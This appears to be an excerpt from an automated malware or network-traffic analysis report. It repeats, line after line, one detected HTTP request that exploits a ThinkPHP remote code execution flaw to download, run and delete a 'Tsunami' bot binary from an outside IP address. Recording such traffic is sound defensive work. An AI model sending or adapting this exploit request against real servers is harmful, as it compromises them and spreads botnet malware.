        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
